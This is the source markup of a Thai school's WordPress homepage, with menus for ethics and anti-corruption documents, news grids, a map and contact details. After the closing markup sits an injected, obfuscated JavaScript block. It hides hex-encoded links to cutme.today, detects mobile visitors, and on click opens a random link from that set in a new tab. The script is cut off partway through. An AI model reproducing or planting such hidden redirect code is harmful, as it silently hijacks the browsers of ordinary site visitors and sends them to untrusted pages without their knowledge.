900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 